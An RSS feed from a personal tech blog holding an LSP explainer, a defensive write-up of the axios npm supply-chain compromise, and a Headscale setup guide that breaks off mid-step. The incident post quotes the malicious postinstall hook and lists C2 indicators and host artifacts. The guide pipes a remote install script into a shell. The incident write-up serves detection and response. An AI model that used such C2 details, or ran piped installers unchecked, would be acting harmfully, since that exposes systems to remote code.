<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Nihesh's Blog</title>
    <link>https://blog.niheshr.com</link>
    <description>Technical blog about web development, WebRTC, system administration, and more</description>
    <language>en-us</language>
    <lastBuildDate>Sun, 05 Apr 2026 00:00:00 GMT</lastBuildDate>
    <atom:link href="https://blog.niheshr.com/rss.xml" rel="self" type="application/rss+xml" />
    <item>
      <title><![CDATA[Language Server Protocol (LSP) Explained: What It Is, How It Works, and Why It Matters]]></title>
      <link>https://blog.niheshr.com/language-server-protocol-lsp-explained</link>
      <guid isPermaLink="true">https://blog.niheshr.com/language-server-protocol-lsp-explained</guid>
      <description><![CDATA[A practical guide to LSP: what it is, how it powers modern editors and AI coding tools, and why it beats traditional editor-specific tooling.]]></description>
      <content:encoded><![CDATA[<p>If you have used auto-complete, go-to-definition, rename symbol, or inline diagnostics in a modern editor, you have likely used an LSP-powered workflow.</p>
<p>LSP stands for <strong>Language Server Protocol</strong>. It changed developer tooling by separating editor UI from language intelligence.</p>
<p>This post explains:</p>
<ul>
<li>what LSP is</li>
<li>how LSP works</li>
<li>how AI coding tools use it</li>
<li>why older approaches struggled</li>
<li>concrete examples you can relate to</li>
</ul>
<h2>What is LSP?</h2>
<p><strong>Language Server Protocol (LSP)</strong> is a standard communication protocol between:</p>
<ul>
<li>a <strong>client</strong> (your editor/IDE), and</li>
<li>a <strong>language server</strong> (a process that understands a specific language deeply)</li>
</ul>
<p>Instead of every editor building language support from scratch, editors speak one protocol and reuse language servers.</p>
<p>Think of it as:</p>
<ul>
<li>editor = frontend/UI</li>
<li>language server = backend intelligence</li>
<li>LSP = API contract between them</li>
</ul>
<h2>Why LSP was needed</h2>
<p>Before LSP became common, language tooling was fragmented.</p>
<p>Each editor had to build and maintain separate support for each language. That meant:</p>
<ul>
<li>duplicate effort</li>
<li>inconsistent behavior across editors</li>
<li>uneven quality</li>
<li>slow updates</li>
</ul>
<p>For example, teams using VS Code, Vim/Neovim, Emacs, Sublime Text, and Atom often got very different experiences for the same language.</p>
<p>LSP solved that by giving all editors a shared protocol for language features.</p>
<h2>How LSP works (simple flow)</h2>
<p>When you open a file, this usually happens:</p>
<ol>
<li>Editor starts a language server process (for example, TypeScript server or Pyright).</li>
<li>Editor sends project/file context to the server.</li>
<li>Server builds understanding (symbols, types, references, diagnostics).</li>
<li>As you type, editor sends incremental updates.</li>
<li>Server responds with:<ul>
<li>completions</li>
<li>errors/warnings</li>
<li>definitions/references</li>
<li>rename edits</li>
<li>code actions</li>
</ul>
</li>
<li>Editor renders results in UI.</li>
</ol>
<p>The protocol itself is message-based (JSON-RPC over stdio or sockets); as a user, you simply experience fast, consistent language intelligence.</p>
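<p>To make that concrete, here is a minimal sketch (in Python, not tied to any particular editor or server; the file URI and position are illustrative) of how a client frames a <code>textDocument/definition</code> request using the LSP base protocol's <code>Content-Length</code> header and a JSON-RPC body:</p>

```python
import json

def frame_lsp_message(payload: dict) -> bytes:
    """Frame a JSON-RPC payload with the LSP base-protocol header."""
    body = json.dumps(payload).encode("utf-8")
    header = f"Content-Length: {len(body)}\r\n\r\n".encode("ascii")
    return header + body

# A go-to-definition request: "where is the symbol at line 10, column 4 defined?"
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "textDocument/definition",
    "params": {
        "textDocument": {"uri": "file:///project/src/app.ts"},
        "position": {"line": 10, "character": 4},
    },
}

message = frame_lsp_message(request)
# The server reads the header, then exactly len(body) bytes of JSON,
# and replies with a Location (URI + range) in the same framing.
print(message.decode("utf-8").split("\r\n\r\n", 1)[0])
```

<p>Every request, response, and notification between editor and server travels in exactly this envelope, which is why one server can serve many editors.</p>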
<h2>Common LSP features you use daily</h2>
<ul>
<li><strong>Auto-complete</strong> with context-aware suggestions</li>
<li><strong>Go to definition / declaration</strong></li>
<li><strong>Find references</strong></li>
<li><strong>Hover type info / docs</strong></li>
<li><strong>Rename symbol</strong> across files safely</li>
<li><strong>Diagnostics</strong> (errors, warnings, hints)</li>
<li><strong>Code actions</strong> (quick fixes, imports, refactors)</li>
<li><strong>Formatting integration</strong> (via LSP or companion tools)</li>
</ul>
<p>These are no longer tied to one editor vendor.</p>
<h2>LSP and AI editors: same foundation, new UX</h2>
<p>This is the part many people miss: modern AI coding tools are not replacing LSP; they often build on top of it.</p>
<p>Tools such as AI-native editors and coding assistants still need reliable language intelligence for:</p>
<ul>
<li>symbol resolution</li>
<li>project-wide references</li>
<li>diagnostics context</li>
<li>safe rename/refactor boundaries</li>
<li>workspace-aware code actions</li>
</ul>
<p>LSP is frequently the layer that provides this structured context.</p>
<h3>Why this matters for AI workflows</h3>
<p>AI suggestions become much better when grounded in real code intelligence.</p>
<p>Without LSP-like context, an AI tool may generate code that looks correct but breaks project semantics. With LSP context, tools can:</p>
<ul>
<li>navigate definitions accurately</li>
<li>detect type or symbol conflicts earlier</li>
<li>perform safer edits across multiple files</li>
<li>reduce hallucinated imports and broken refactors</li>
</ul>
<p>So the better way to think about it is:</p>
<ul>
<li>LSP = trusted code intelligence layer</li>
<li>AI = reasoning/generation layer</li>
<li>great DX = both working together</li>
</ul>
<h2>Traditional methods (and why they were weaker)</h2>
<p>Before LSP, language support was typically done in one of these ways:</p>
<h3>1) Regex/text-based plugins</h3>
<p>Examples:</p>
<ul>
<li>syntax-only plugins in Vim/Sublime</li>
<li>editor snippets + keyword matching</li>
</ul>
<p>Limitations:</p>
<ul>
<li>no deep semantic understanding</li>
<li>fragile with large codebases</li>
<li>poor rename/refactor safety</li>
</ul>
<h3>2) Editor-specific language plugins/APIs</h3>
<p>Examples:</p>
<ul>
<li>custom VS Code extension language logic only for VS Code</li>
<li>custom JetBrains plugin implementations per language integration path</li>
</ul>
<p>Limitations:</p>
<ul>
<li>repeated implementation across editors</li>
<li>inconsistent feature parity</li>
<li>high maintenance cost</li>
</ul>
<h3>3) Tag/index based navigation</h3>
<p>Examples:</p>
<ul>
<li><code>ctags</code>, <code>etags</code>, static symbol indexers</li>
</ul>
<p>Limitations:</p>
<ul>
<li>good for navigation, weak for type-aware refactoring</li>
<li>no real-time diagnostics at modern scale</li>
<li>hard with dynamic/complex language features</li>
</ul>
<h3>4) Build-tool-only feedback loops</h3>
<p>Examples:</p>
<ul>
<li><code>tsc</code>, <code>mypy</code>, <code>javac</code>, <code>go build</code>, <code>eslint</code> only through terminal</li>
</ul>
<p>Limitations:</p>
<ul>
<li>useful but not interactive while typing</li>
<li>slower “edit -&gt; save -&gt; run -&gt; read output” loop</li>
</ul>
<p>These methods are still useful in specific scenarios, but for day-to-day developer experience, LSP is generally superior.</p>
<h2>Real-world example: TypeScript</h2>
<p>Without LSP-style tooling:</p>
<ul>
<li>you edit code</li>
<li>run <code>tsc</code></li>
<li>parse terminal errors</li>
<li>manually find symbol usages</li>
</ul>
<p>With LSP:</p>
<ul>
<li>diagnostics appear while typing</li>
<li>“rename symbol” updates references across files</li>
<li>go-to-definition and hover type are instant</li>
</ul>
<p>That reduces context-switching and mistake risk.</p>
<h2>Another example: Python</h2>
<p>Using Pyright (LSP server) + your editor:</p>
<ul>
<li>you get type diagnostics in editor</li>
<li>import fixes and code actions</li>
<li>jump-to-definition across project</li>
</ul>
<p>Compare that to terminal-only <code>flake8</code> + <code>mypy</code> loops: still valuable, but slower and less interactive during coding.</p>
<h2>Does LSP replace compilers, linters, and formatters?</h2>
<p>Not exactly.</p>
<p>LSP complements them.</p>
<ul>
<li>Compiler: source of truth for builds</li>
<li>Linters: policy/style/static checks</li>
<li>Formatter: code style consistency</li>
<li>LSP: editor-time interactive intelligence</li>
</ul>
<p>Best setup is layered:</p>
<ul>
<li>LSP for fast feedback while coding</li>
<li>CI checks for strict enforcement</li>
</ul>
<h2>LSP ecosystem examples</h2>
<p>Popular language servers:</p>
<ul>
<li>TypeScript: <code>typescript-language-server</code> / tsserver-backed flows</li>
<li>Python: <code>pyright</code>, <code>pylsp</code></li>
<li>Go: <code>gopls</code></li>
<li>Rust: <code>rust-analyzer</code></li>
<li>C/C++: <code>clangd</code></li>
</ul>
<p>Popular clients/editors:</p>
<ul>
<li>VS Code</li>
<li>Neovim</li>
<li>Emacs</li>
<li>Sublime Text</li>
<li>Helix</li>
</ul>
<p>Same protocol, different editor UX.</p>
<h2>Trade-offs and caveats</h2>
<p>LSP is great, but not magic:</p>
<ul>
<li>Some servers are heavy on memory/CPU in big monorepos.</li>
<li>Feature quality depends on the maturity of the specific server implementation.</li>
<li>Dynamic languages can still leave constructs that static analysis cannot fully resolve.</li>
<li>Setup can require tuning (root detection, virtual envs, formatting pipelines).</li>
</ul>
<p>Still, for most teams, the productivity gain is substantial.</p>
<h2>When traditional methods are still useful</h2>
<p>Traditional tools still matter:</p>
<ul>
<li>CLI linters/compilers in CI are mandatory.</li>
<li><code>ctags</code> can be fast for basic navigation in very constrained environments.</li>
<li>Minimal editors in remote boxes may skip full LSP.</li>
</ul>
<p>But for modern local development, LSP gives a better default experience.</p>
<h2>Final takeaway</h2>
<p>LSP succeeded because it standardized language intelligence as a reusable service.</p>
<p>Instead of building N language integrations for N editors, language ecosystems can invest in one strong server and benefit everyone.</p>
<p>And now the same principle extends beyond classic editors: the same language intelligence backbone is helping power modern AI-assisted coding experiences too.</p>]]></content:encoded>
      <pubDate>Sun, 05 Apr 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>lsp</category>
      <category>developer-tools</category>
      <category>editors</category>
      <category>vscode</category>
      <category>neovim</category>
      <category>programming</category>
      <category>ai-coding</category>
      <category>claude-code</category>
      <category>copilot</category>
    </item>
<item>
      <title><![CDATA[Axios npm Hack: What Happened and How to Fix It]]></title>
      <link>https://blog.niheshr.com/axios-npm-hack-what-happened-and-how-to-fix-it</link>
      <guid isPermaLink="true">https://blog.niheshr.com/axios-npm-hack-what-happened-and-how-to-fix-it</guid>
      <description><![CDATA[Axios npm package compromise explained in detail: what happened, who was affected, full attack flow, IOCs, incident response, and prevention steps for teams.]]></description>
      <content:encoded><![CDATA[<p>On March 31, 2026, the npm package <strong>axios</strong> was compromised in a high-impact supply chain attack.</p>
<p>This post is the full breakdown in one place:</p>
<ul>
<li>what happened</li>
<li>why it happened</li>
<li>who was involved (based on public reporting)</li>
<li>how the attack flow worked end-to-end</li>
<li>how it affected developers, CI pipelines, and organizations</li>
<li>what to do now and how to prevent this class of incident</li>
</ul>
<h2>Quick Summary</h2>
<table>
<thead>
<tr>
<th>Item</th>
<th>Details</th>
</tr>
</thead>
<tbody><tr>
<td>Compromised versions</td>
<td><code>axios@1.14.1</code>, <code>axios@0.30.4</code></td>
</tr>
<tr>
<td>Safe versions</td>
<td><code>axios@1.14.0</code>, <code>axios@0.30.3</code></td>
</tr>
<tr>
<td>Malicious dependency</td>
<td><code>plain-crypto-js@4.2.1</code></td>
</tr>
<tr>
<td>Trigger</td>
<td>npm lifecycle script: <code>postinstall</code></td>
</tr>
<tr>
<td>Primary risk</td>
<td>Remote access trojan (RAT) delivery on macOS, Windows, Linux</td>
</tr>
</tbody></table>
<p>If your environment installed the compromised versions, assume compromise until proven otherwise.</p>
<h2>What Happened</h2>
<p>This incident was <strong>not</strong> an axios code bug. It was a package publishing trust breach.</p>
<p>Public analysis across multiple sources indicates this flow:</p>
<ol>
<li>An attacker gained access to an axios maintainer npm publishing path.</li>
<li>A package called <code>plain-crypto-js</code> was staged in advance.</li>
<li>Malicious <code>plain-crypto-js@4.2.1</code> was published with a <code>postinstall</code> dropper.</li>
<li>Two axios versions were published with this dependency added:<ul>
<li><code>axios@1.14.1</code></li>
<li><code>axios@0.30.4</code></li>
</ul>
</li>
<li>On <code>npm install</code>, <code>setup.js</code> in the malicious dependency executed automatically.</li>
<li>The dropper contacted C2 and pulled platform-specific stage-2 payloads.</li>
<li>The package attempted anti-forensics cleanup to hide malicious traces.</li>
</ol>
<p>This was fast, coordinated, and designed for scale.</p>
<h2>Why It Happened</h2>
<p>The root cause appears to be <strong>release pipeline trust failure</strong>, not application logic failure.</p>
<p>The major enabling factors were:</p>
<ul>
<li>A trusted maintainer publishing path was abused.</li>
<li>A long-lived token/manual publish path appears to have been available.</li>
<li>The malicious release looked like a normal semver update.</li>
<li>npm lifecycle scripts (<code>postinstall</code>) execute code during install by design.</li>
<li>Many projects accepted the poisoned versions via normal dependency resolution.</li>
</ul>
<p>In short: attackers abused package trust and install-time code execution.</p>
<h2>Who Did It</h2>
<p>Based on public reporting:</p>
<ul>
<li>The compromised publishes were associated with the maintainer account path linked to <code>jasonsaayman</code>.</li>
<li>Attacker-related emails reported in public analysis included <code>ifstap@proton.me</code> and <code>nrwise@proton.me</code>.</li>
<li>The malicious dependency package was associated with <code>plain-crypto-js</code>.</li>
</ul>
<p>Attribution to a specific threat group is still a separate intelligence question.</p>
<p>Some researchers have discussed possible overlap with DPRK-linked tradecraft, but this should be treated as <strong>investigative context</strong>, not final attribution, unless formally confirmed by authoritative sources.</p>
<h2>Full Attack Flow (End-to-End)</h2>
<h3>Stage 0: Pre-staging</h3>
<p>Attackers first published a clean-looking package version (<code>plain-crypto-js@4.2.0</code>) to establish package history and lower suspicion.</p>
<h3>Stage 1: Weaponization</h3>
<p>They then published <code>plain-crypto-js@4.2.1</code> containing:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This is critical because <code>postinstall</code> runs automatically when npm installs the package.</p>
<h3>Stage 2: Distribution through trusted package</h3>
<p>Compromised axios releases added <code>plain-crypto-js@^4.2.1</code> as a dependency.</p>
<p>Any environment resolving those versions pulled and executed the malicious dependency.</p>
<h3>Stage 3: Execution</h3>
<p><code>setup.js</code> (obfuscated JavaScript) decoded runtime strings and executed platform-specific commands.</p>
<p>Reported behavior:</p>
<ul>
<li>platform detection</li>
<li>C2 communication</li>
<li>payload retrieval/launch for macOS, Windows, Linux</li>
</ul>
<h3>Stage 4: Anti-forensics</h3>
<p>The installer attempted to erase or reduce obvious evidence:</p>
<ul>
<li>delete dropper artifacts</li>
<li>replace manifest files with cleaner versions</li>
</ul>
<p>This made post-install inspection harder and increased chance of false confidence.</p>
<h2>Timeline (UTC, Consolidated)</h2>
<p>Public sources align on this sequence:</p>
<ul>
<li><code>plain-crypto-js@4.2.0</code> published as clean decoy</li>
<li><code>plain-crypto-js@4.2.1</code> published with malicious <code>postinstall</code></li>
<li><code>axios@1.14.1</code> published with malicious dependency</li>
<li><code>axios@0.30.4</code> published about 39 minutes later</li>
<li>Community detection and maintainer/security response</li>
<li>npm removed compromised versions after a short exposure window</li>
</ul>
<p>Even a short exposure window was enough because CI runners and developer systems perform installs continuously.</p>
<h2>How It Affected Real Systems</h2>
<h3>Developer machines</h3>
<p>Any developer who ran <code>npm install</code> during exposure could have executed malware without direct interaction.</p>
<h3>CI/CD pipelines</h3>
<p>This is the highest-risk path because CI often has:</p>
<ul>
<li>cloud credentials</li>
<li>deployment keys</li>
<li>package publish tokens</li>
<li>signing keys</li>
</ul>
<p>Compromise in CI can become production compromise quickly.</p>
<h3>Transitive dependency consumers</h3>
<p>Teams did not need to explicitly depend on axios to be exposed. Transitive resolution was enough.</p>
<h3>Observed impact</h3>
<p>Security vendors publicly reported substantial real-world endpoint impact during this incident.</p>
<h2>Detection and Triage</h2>
<p>Start simple, then escalate.</p>
<h3>1) Version and dependency checks</h3>
<pre><code class="language-bash">npm ls axios plain-crypto-js
npm ls -g axios
</code></pre>
<h3>2) Lockfile checks</h3>
<pre><code class="language-bash">grep -R --line-number -E &quot;axios@1\.14\.1|axios@0\.30\.4|plain-crypto-js&quot; package-lock.json npm-shrinkwrap.json yarn.lock pnpm-lock.yaml 2&gt;/dev/null
</code></pre>
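<p>If you prefer a scriptable check over <code>grep</code>, here is a minimal Python sketch that walks an npm v2/v3 <code>package-lock.json</code> (the one with a <code>packages</code> map) and flags the versions named in this incident. The function name is illustrative; the bad-version list comes from the summary table above:</p>

```python
import json

# Known-bad packages from this incident (per public reporting)
BAD = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}

def scan_lockfile(lock: dict) -> list[str]:
    """Return sorted 'name@version' hits found in an npm v2/v3 lockfile dict."""
    hits = set()
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/axios" or
        # "node_modules/foo/node_modules/plain-crypto-js"
        name = path.rsplit("node_modules/", 1)[-1]
        if meta.get("version") in BAD.get(name, ()):
            hits.add(f"{name}@{meta['version']}")
    return sorted(hits)

# Usage: scan_lockfile(json.load(open("package-lock.json")))
```

<p>This covers npm lockfiles only; <code>yarn.lock</code> and <code>pnpm-lock.yaml</code> use different formats, which is why the <code>grep</code> above checks all of them.</p>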
<h3>3) Git history checks</h3>
<pre><code class="language-bash">git log -p -- package-lock.json | grep -E &quot;plain-crypto-js|axios@1\.14\.1|axios@0\.30\.4&quot;
</code></pre>
<h3>4) Host artifact checks</h3>
<pre><code class="language-bash"># macOS
ls -la /Library/Caches/com.apple.act.mond 2&gt;/dev/null

# Linux
ls -la /tmp/ld.py 2&gt;/dev/null
</code></pre>
<pre><code class="language-powershell"># Windows PowerShell
Test-Path &quot;$env:PROGRAMDATA\wt.exe&quot;
</code></pre>
<h3>5) Network IOC checks</h3>
<pre><code class="language-bash">netstat -an | grep &quot;142.11.206.73&quot;
</code></pre>
<p>Also query EDR, DNS, proxy, and firewall logs for historical beaconing patterns.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Value</th>
</tr>
</thead>
<tbody><tr>
<td>Domain</td>
<td><code>sfrclak.com</code></td>
</tr>
<tr>
<td>IP</td>
<td><code>142.11.206.73</code></td>
</tr>
<tr>
<td>Port</td>
<td><code>8000</code></td>
</tr>
<tr>
<td>Path</td>
<td><code>/6202033</code></td>
</tr>
<tr>
<td>Malicious dependency</td>
<td><code>plain-crypto-js@4.2.1</code></td>
</tr>
<tr>
<td>Bad axios versions</td>
<td><code>1.14.1</code>, <code>0.30.4</code></td>
</tr>
</tbody></table>
<p>Likely host artifacts:</p>
<ul>
<li>macOS: <code>/Library/Caches/com.apple.act.mond</code></li>
<li>Windows: <code>%PROGRAMDATA%\wt.exe</code></li>
<li>Linux: <code>/tmp/ld.py</code></li>
</ul>
<p>IOCs are not exhaustive. Absence of one IOC does not prove safety.</p>
<h2>What To Do If You Were Exposed</h2>
<p>If compromised versions were installed, treat the host as potentially compromised.</p>
<h3>Immediate response</h3>
<ol>
<li>Isolate affected endpoints/runners.</li>
<li>Block known IOC infrastructure.</li>
<li>Pause risky deployments from suspect pipelines.</li>
</ol>
<h3>Credential and secret response</h3>
<p>Rotate:</p>
<ul>
<li>account passwords (GitHub, npm, cloud consoles, CI admin users, and email)</li>
<li>npm tokens</li>
<li>cloud/API keys</li>
<li>SSH keys</li>
<li>DB credentials/passwords</li>
<li>CI secrets and signing material</li>
</ul>
<p>Also revoke active sessions where possible and regenerate recovery codes for critical accounts.</p>
<h3>Investigation and recovery</h3>
<ol>
<li>Audit build and deploy history in exposure window.</li>
<li>Review unusual commits, releases, and registry actions.</li>
<li>Rebuild affected systems from clean images where possible.</li>
<li>Preserve evidence for internal review and postmortem.</li>
</ol>
<p>Do not rely on &quot;remove package and continue&quot; as a response strategy.</p>
<h2>How To Prevent This Next Time</h2>
<p>Layer controls instead of relying on one fix.</p>
<h3>1) Lockfile discipline</h3>
<ul>
<li>commit lockfiles</li>
<li>use <code>npm ci</code> in CI</li>
<li>block unexpected lockfile drift</li>
</ul>
<h3>2) Safer version policies</h3>
<pre><code class="language-ini"># .npmrc
save-exact=true
</code></pre>
<h3>3) Lifecycle hardening</h3>
<pre><code class="language-ini"># .npmrc
ignore-scripts=true
</code></pre>
<p>Only enable this globally after validating compatibility; some packages rely on install scripts to build native components.</p>
<h3>4) Delay brand-new publishes</h3>
<pre><code class="language-bash">npm config set min-release-age 3
</code></pre>
<p>Delaying installation of brand-new releases shrinks the window in which a freshly published malicious version can reach your machines.</p>
<h3>5) Monitor dependency anomalies</h3>
<p>Alert on:</p>
<ul>
<li>new transitive dependencies in critical packages</li>
<li>unexpected publisher metadata changes</li>
<li>publish path anomalies (trusted CI vs manual CLI)</li>
<li>suspicious install scripts</li>
</ul>
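<p>The first bullet can be automated cheaply in CI by diffing the previous and current lockfiles. Here is a minimal Python sketch (npm v2/v3 lockfile layout assumed; the function name is illustrative) that flags packages added since the last known-good lockfile:</p>

```python
def new_dependencies(old_lock: dict, new_lock: dict) -> list[str]:
    """List packages present in the new npm lockfile but absent from the old one."""
    old_paths = set(old_lock.get("packages", {}))
    return sorted(
        f"{path}@{meta.get('version', '?')}"
        for path, meta in new_lock.get("packages", {}).items()
        if path and path not in old_paths  # skip the root "" entry
    )
```

<p>Failing the build, or requiring manual review, when this list is non-empty for a critical dependency could have surfaced <code>plain-crypto-js</code> the moment it appeared. Note this catches newly added packages only; version bumps of existing packages need a separate check.</p>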
<h3>6) Restrict CI egress</h3>
<p>Runners should not have broad outbound internet by default.</p>
<p>If malware cannot reach C2, impact is significantly reduced.</p>
<h2>Final Takeaway</h2>
<p>This incident proved that <strong>dependency installation is an execution surface</strong> and must be treated like production attack surface.</p>
<p>Secure coding is necessary, but not sufficient.</p>
<p>Secure dependency intake, secure publishing trust, and fast incident response are now equally important.</p>
<h2>References</h2>
<ul>
<li><a href="https://github.com/theNetworkChuck/axios-attack-guide">https://github.com/theNetworkChuck/axios-attack-guide</a></li>
<li><a href="https://socket.dev/blog/axios-npm-package-compromised">https://socket.dev/blog/axios-npm-package-compromised</a></li>
<li><a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan</a></li>
<li><a href="https://github.com/axios/axios/issues/10604">https://github.com/axios/axios/issues/10604</a></li>
<li><a href="https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package">https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package</a></li>
<li><a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</a></li>
</ul>]]></content:encoded>
      <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>axios</category>
      <category>npm</category>
      <category>supply-chain-security</category>
      <category>javascript</category>
      <category>incident-response</category>
      <category>hack</category>
    </item>
<item>
      <title><![CDATA[Setting Up Headscale: Self-Hosted Tailscale Control Server]]></title>
      <link>https://blog.niheshr.com/headscale-setup</link>
      <guid isPermaLink="true">https://blog.niheshr.com/headscale-setup</guid>
      <description><![CDATA[Complete guide to setting up Headscale, an open-source self-hosted implementation of the Tailscale control server, and connecting clients.]]></description>
      <content:encoded><![CDATA[<p>Headscale is an open-source, self-hosted implementation of the Tailscale control server. It allows you to create your own private mesh VPN network without relying on Tailscale&#39;s cloud infrastructure. This guide walks through setting up Headscale and connecting Tailscale clients.</p>
<h2>What is Headscale?</h2>
<p>Headscale provides:</p>
<ul>
<li>A self-hosted alternative to Tailscale&#39;s coordination server</li>
<li>Full control over your mesh network infrastructure</li>
<li>WireGuard-based secure networking</li>
<li>No dependency on third-party cloud services</li>
<li>Support for all major Tailscale clients</li>
</ul>
<p>If you want the benefits of Tailscale&#39;s mesh VPN but need to keep everything on your own infrastructure, Headscale is the solution.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu/Debian server (or similar Linux distribution)</li>
<li>Root or sudo access</li>
<li>Domain name pointing to your server</li>
<li>SSL certificate (we&#39;ll use Let&#39;s Encrypt)</li>
<li>Open ports: 443 (HTTPS), 3478 (STUN)</li>
</ul>
<h2>Step 1: Install Headscale</h2>
<p>Download and install the latest Headscale release:</p>
<pre><code class="language-bash">HEADSCALE_VERSION=&quot;&quot; # Latest release from https://github.com/juanfont/headscale/releases, e.g. &quot;X.Y.Z&quot; (do not add the &quot;v&quot; prefix!)
HEADSCALE_ARCH=&quot;&quot; # Your system architecture, e.g. &quot;amd64&quot;
wget --output-document=headscale.deb \
 &quot;https://github.com/juanfont/headscale/releases/download/v${HEADSCALE_VERSION}/headscale_${HEADSCALE_VERSION}_linux_${HEADSCALE_ARCH}.deb&quot;
sudo apt install ./headscale.deb
</code></pre>
<p>Verify the installation:</p>
<pre><code class="language-bash">headscale version
</code></pre>
<h2>Step 2: Configure Nginx with SSL</h2>
<p>Install Nginx and Certbot:</p>
<pre><code class="language-bash">sudo apt update
sudo apt install nginx certbot python3-certbot-nginx -y
</code></pre>
<p>Create an Nginx config for Headscale:</p>
<pre><code class="language-bash">sudo nano /etc/nginx/sites-available/headscale
</code></pre>
<p>Add the following configuration:</p>
<pre><code class="language-nginx">server {
    listen 80;
    server_name headscale.your-domain.com;

    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection &quot;upgrade&quot;;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_buffering off;
        proxy_read_timeout 86400;
    }
}
</code></pre>
<p>Enable the site and obtain SSL certificate:</p>
<pre><code class="language-bash">sudo ln -s /etc/nginx/sites-available/headscale /etc/nginx/sites-enabled/
sudo nginx -t
sudo systemctl reload nginx
sudo certbot --nginx -d headscale.your-domain.com
</code></pre>
<p>Certbot will automatically configure SSL and set up auto-renewal.</p>
<h2>Step 3: Configure Headscale</h2>
<p>Edit the configuration file:</p>
<pre><code class="language-bash">sudo nano /etc/headscale/config.yaml
</code></pre>
<p>Here&#39;s a recommended configuration:</p>
<pre><code class="language-yaml"># Server configuration
server_url: https://headscale.your-domain.com
listen_addr: 127.0.0.1:8080
metrics_listen_addr: 127.0.0.1:9090

# gRPC settings
grpc_listen_addr: 127.0.0.1:50443
grpc_allow_insecure: false

# Database configuration
database:
  type: sqlite
  sqlite:
    path: /var/lib/headscale/db.sqlite

# TLS handled by Nginx reverse proxy
tls_cert_path: &quot;&quot;
tls_key_path: &quot;&quot;

# Noise protocol (required for newer clients)
noise:
  private_key_path: /var/lib/headscale/noise_private.key

# IP prefixes for your network
prefixes:
  v4: 100.64.0.0/10
  v6: fd7a:115c:a1e0::/48

# DERP configuration
derp:
  server:
    enabled: true
    region_id: 999
    region_code: &quot;headscale&quot;
    region_name: &quot;Headscale Embedded DERP&quot;
    stun_listen_addr: &quot;0.0.0.0:3478&quot;
    private_key_path: /var/lib/headscale/derp_server_private.key
    automatically_add_embedded_derp_region: true
    ipv4: YOUR_PUBLIC_IP
    ipv6: &quot;&quot;
  urls: []
  paths: []
  auto_update_enabled: true
  update_frequency: 24h


# DNS configuration
dns:
  magic_dns: true
  base_domain: tailnet.your-domain.com
  nameservers:
    global:
      - 1.1.1.1
      - 8.8.8.8

# Log settings
log:
  format: text
  level: info

# Policy (ACLs) - optional
policy:
  mode: file
  path: &quot;&quot;

# Unix socket for CLI
unix_socket: /var/run/headscale/headscale.sock
unix_socket_permission: &quot;0770&quot;
</code></pre>
<p>Replace the following values:</p>
<ul>
<li><code>headscale.your-domain.com</code> with your actual domain</li>
<li><code>YOUR_PUBLIC_IP</code> with your server&#39;s public IP address</li>
<li><code>tailnet.your-domain.com</code> with your preferred MagicDNS base domain</li>
</ul>
<h2>Step 4: Create Required Directories</h2>
<pre><code class="language-bash">sudo mkdir -p /var/lib/headscale
sudo mkdir -p /var/run/headscale
sudo chown -R headscale:headscale /var/lib/headscale
sudo chown -R headscale:headscale /var/run/headscale
</code></pre>
<h2>Step 5: Configure Firewall</h2>
<p>Allow the necessary ports:</p>
<pre><code class="language-bash">sudo ufw allow &#39;Nginx Full&#39;
sudo ufw allow 3478/udp
sudo ufw reload
</code></pre>
<p>For cloud providers, ensure your security groups allow:</p>
<ul>
<li><strong>TCP:</strong> 80, 443 (HTTP/HTTPS via Nginx)</li>
<li><strong>UDP:</strong> 3478 (STUN for DERP)</li>
</ul>
<h2>Step 6: Start Headscale</h2>
<p>Enable and start the service:</p>
<pre><code class="language-bash">sudo systemctl enable headscale
sudo systemctl start headscale
sudo systemctl status headscale
</code></pre>
<p>Check the logs for any errors:</p>
<pre><code class="language-bash">sudo journalctl -u headscale -f
</code></pre>
<h2>Step 7: Create a User</h2>
<p>Headscale organizes devices by users. Create your first user:</p>
<pre><code class="language-bash">sudo headscale users create myuser
</code></pre>
<p>List users:</p>
<pre><code class="language-bash">sudo headscale users list
</code></pre>
<h2>Step 8: Generate Pre-Authentication Keys</h2>
<p>Pre-auth keys allow devices to join without manual approval:</p>
<pre><code class="language-bash"># Create a reusable key (expires in 24 hours by default)
sudo headscale preauthkeys create --user myuser --reusable --expiration 24h
</code></pre>
<p>For a one-time use key:</p>
<pre><code class="language-bash">sudo headscale preauthkeys create --user myuser --expiration 1h
</code></pre>
<p>List existing keys:</p>
<pre><code class="language-bash">sudo headscale preauthkeys list --user myuser
</code></pre>
<h2>Step 9: Connect Tailscale Clients</h2>
<h3>Linux Client</h3>
<p>Install Tailscale:</p>
<pre><code class="language-bash">curl -fsSL https://tailscale.com/install.sh | sh
</code></pre>
<p>Connect to your Headscale server:</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<p>Or without a pre-auth key (requires manual approval):</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com
</code></pre>
<p>Then approve the node on the server:</p>
